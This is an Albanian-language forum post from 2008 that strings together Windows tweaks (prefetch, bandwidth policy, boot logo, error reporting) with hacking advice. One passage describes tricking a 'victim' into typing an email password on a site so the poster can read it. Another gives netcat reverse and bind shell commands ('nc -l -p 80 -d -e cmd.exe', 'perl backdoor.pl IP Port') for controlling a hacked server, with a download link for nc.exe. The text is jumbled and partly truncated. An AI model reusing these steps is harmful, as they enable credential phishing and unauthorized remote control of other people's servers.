KHC Solutions


 
ForumPortaliPytėsoriRegjistrohuidentifikimi

Share | 
 

 Si ta pėrdorim RUN nė Windows?

Shko poshtė 
AutoriMesazh
Registration date : 01/01/1970

MesazhTitulli: Si ta pėrdorim RUN nė Windows?   Sat Sep 27, 2008 10:53 am

Bone PC tuaj me te shpejt .Shkojm Start>> Pastaj Run >> E shkruajm : regedit >> HKEY_LOCAL_MACHINE >>> SYSTEM >>> Current ControlSet >>> Control >> Sassion Menager >>> Memory Menagment >>>PrefatchParameters>>> Pastaj ju ne te djatht e keni EnablePrefetcher >> Klikoni 2 her me maus edhe aty ku shkruan numri 3 e bani 1 edhe OK >>> Edhe ne fund Ristart PC dhe ma merr mendja qe do ti vreni ndryshimet.... web i passave -------------------------------------------------------------------------------- hini en www.arab.net edhe tani e sheh nalt ne anen e djatht te dritares e keni me shkru passin edhe imellen po ti duhesh me ja lshu viktimes tane me i than shkruje imellen edhe passin se osht qitu ni program me thy passa edhe kur ta shkrun ai ti e sheh nalt ku e shkrun web faqen ja sheh passin hahaha edhe mos menon qe osht nai kurth prej meje ------------------------------------------------ Qe ne kete site mund te shiko se sa e keni shpejtesin e internetit !!! www.speedtest.net Si ta freskojm shpejtsin e internetit -------------------------------------------------------------------------------- Si Te Rrisim Shpejtesin E Internetit Per ta ber Kete , duhet ti Keni previligjet E Administratorit ... Per te hyre sikur Administrator...duhet tja beni keshtu..: Shkoni Start --> Log Of ... --> Log Of Pasi te Dilni Nga Nga Username Qe Jeni Duke Perdorur Dhe Ju Parashtrohet Pyetje Se Ne Cilin Username Doni Te Kyceni Ne Windowsin Tuaj ju Veproni Atl + CTRL Del dhe kur te ju Paraqitet Nje Dritare e Vogel Shkruani Administrator Dhe Shtypeni Enter Tash jeni te kyqur si Administrator dhe mundemi tja fillojm.... Kjo Ishte Saper Tu Kycur Sikur Administrator.. =============================================== Tash pasi qe jemi te Kyqur Sikur Administrator Mundemi Tja Fillojm... Klikoni Ne .. Start --> RUN --> gpedit.msc dhe Shtypeni Enter Do te ju hapet nje faqe ku do te duhet te veproni: Hapeni "local computer policy" Hapeni "administrative templates" Hapeni "network" Hapeni "QoS Packet Scheduler" Ne Anen e djatht te dritares klikoni ne "limit reservable bandwidth" Dhe klikoni ne "enabled" Pak me posht pasi qe ta beni "Enabled" shkoni ne "Bandwidth limit %" dhe ndrojeni ate prej ne 20 (apo sa eshte) ne 0 dhe klikoni OK.... Pastaj restartoni PC-ne dhe kycuni ne modin normal......dhe to ta shihni ndryshimin... =============================================== -------------------------------------------------------- Restarto PC-n edhe hyn ne Bios duke klikuar tastin DEL (delete) nese e ke PC me mutherbort qe prej vitit 2004 e kendej. Pasi te hysh ne Bios aty i ke te dhenat e PC dhe mundesh me ja ndryshu shpejtesin Processorit. Un ju sygjeroj qe mos ta beni kete pasi qe aj processor cka ju e ke ne pc e nese eshte 1.8 GHz ather aje eshte testuar per cate shperjtesi e nese ti ja nderron shpejtesin prej 1.8 GHz ne 2.0 ose edhe 2.4 GHz ateher nje kohe te punon PC-ja por shum jane gjasat e medha qe aj nje dit te digjet pasi krijon temapratur te madhe ne vete dhe nuk ka mundsi qe kulleroi qe eshte i vendosur ta ftoh Processorin. Nejse fillojm... Ma se pari shkojm ne Start tani shkojm ne Run dhe e shkruajm cmd ( vlen per windows xp) e per windows 2000 duhet te shkruhet command dhe tani na hapet 1 dritate e zez ku duhet te shkruajm keshtut: ipconfig/all dhe e klikojm Enter tani na japin rezultatet se qfar IP ka aj internet cafe ku jeni ju apo ku ta di une. E permenda Internet Kafe sepse ka te atill qe dijn te vjedhin rrjetin por nuk e dijn se si ta gjejn IP-n dhe Mac IP-n. Ne tutorialin e ardhshem do ta spjegoj se si me gjet MAC Ip-n permes Pc-es. Me vendos emrin tee ora e pc-s Start Control Panel Regional and language Options Customize Time Time format h:mm 'emriJuaj' ( keshtu e shkruani ) Mos harroni qe emrin tuaj me kufizu me keto gjysme thonjezat 'emri juaj' Shikoni cito: 1.Shko Te MyComputer 2.Me Tastin E Djatht Kliko Properties 3.Pastaj shko te Advanced 4.Pastaj Shko tek "error reporting button" 5.Kliko Disable error reporting 6.Kliko OK 7.Kliko prap OK Ju mundeni me shpejtu shpejtsin e startit te Windows Xp-s duke e dezaktivuar logon e boot-it. Per kete klikoni me butonin e djatht te mausit tuaj mbi ikonen My Computer tani zgjedhni komanden Properties.Pastaj shkoni tek Advanced dhe klikoni mbi Settings tek rubrikaStarting and recovery.Pastaj klikoni te butoni Edit te rubrika Starting of the system. Tani ju hapet dosja boot.ini qe ju duhet ta editoni . Shtoni /noguiboot djathtas menjeher mbas /fastdetect , me nje hapsir(Space) ne mes te /fastdetect dhe /noguiboot . E regjistroni editimin e boot.ini ose kur ta mbyllni ju pyt apo direkt me CTRL+S. Pastaj e konfirmoni me OK-ej . Ristaroni kompjuterin dhe logoja nuk shqafet me ... Per me kthy logon e Windows Xp-s ju duhet te veproni si me lart dhe duke fshi /noguiboot prej boot.ini dhe e regjistroni (e beni Save) . +++++++++++++++++++++++++++++++++++++++++++ Pik se pari Cka eshte NETCAT ? NETCAT nje program i vogel qe ju lidh mes pc suaj me serverin e hackeruar Se pari e Bejm Download Netcat ne: http://xpl.by.ru/nc.exe E Bejm Download Pastaj e Futim tek te C:\Windows\ Pastaj Shkojme START , Run , Shkruajm: nc -vv -l -p 80 Pra me ket komand aktivizohet netcati dhe pritet lidhje nga jasht ne pc tuaj ne Portin 80 pra pasi keni hy ne system keni CMD Shell acess ne shell.php ksiptool by Cn e shenoni ne CMD Komanden Ne Server: perl backdoor.pl IPaddresa Port Dhe direkt do te lidhet serveri hackeruar me pc e juaj dhe KENI SHell Acess tash mundeni me bo cka te doni deri sa i keni te drejtat e kufizuara " nese nuk funksionon komanda: perl backdoor.pl IPaddresa Port atehere lexoni mesimin " si me perdor backdoor " pra si me bo download si me e startu ne at server te hackeruar dhe nese jeni NE Ndonje Network dhe IP addresa e juaj nuk eshte e lshume nga jasht pra nga REMOTE IP ne pc e juaj smund te lidheni duhet me hy ne Router > pastaj Virtual Server apo NAT & Ports aty e beni Nese vjen nga jasht lidhje te Kercej ne Network IP qe e keni ne shpi ne pc e juaj dhe lidheni me suksess. nese nuk e dini ketu qfar ip me dhen perl backdoor.pl IPaddresa Port e shikoni ateher ip e juaj ketu www.ksip.de dhe e shenoni dhe gati e mesuat si me perdor Netcat per ne Linux kurse nese keni hy NE Ndonje web qe ka IIS eshte Windows Server ne Netcat Shenoni nc -l -p 80 -d -e cmd.exe <<< kjo eshte komanda per pritje nga windows serveri i hackeruar nese i keni futur atje backdoor pra . Me falni ndoshta i kam postuar ne wend te gabuar por nese eshte ne wend te gabuar barteni te vendi i duhur ! Ja disa weba per te hapur free web-site kjo eshte ne menyr sa me te leht kjo ma shum o per fillestar/e Ja Linkat : 1.http://www.homestead.com/?s_cid=G20344 2.http://www.wetpaint.com/cyo?r=312&ut...FRvXXgodICpjPQ Une po e postoj edhe njo per me hap web-site ne com,biz,net,info,org por ky web-site sherben edhe pėr tė transferuar ne com ! Por kjo i nevojitet te gjithve ! ja dhe linku : https://secure.netfirms.com/signup/n...figure.php?pid[]=1 Pėr transfer ju kisha sugjeru qe ta jepni numrin e cc por asni cent nuk jua merr kurse per me qel web ne com,org etj duhet te jepni numrin e cc por aty jua merr 4.95 e hap nje web psh www.kipa-83.piczo.com edhe e qet qit kod edhe \runi se pju merren met javascript:R=0; x1=.1; y1=.05; x2=1000; y2=.24; x3=1.6; y3=.24;x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;function A(){for(i=0; i View High Resolution Order Prints & Gifts Create Your Own Site View High Resolution Order Prints & Gifts Create Your Own Site .
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
Si ta pėrdorim RUN nė Windows?
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
KHC Solutions :: Windows-
Kėrce tek: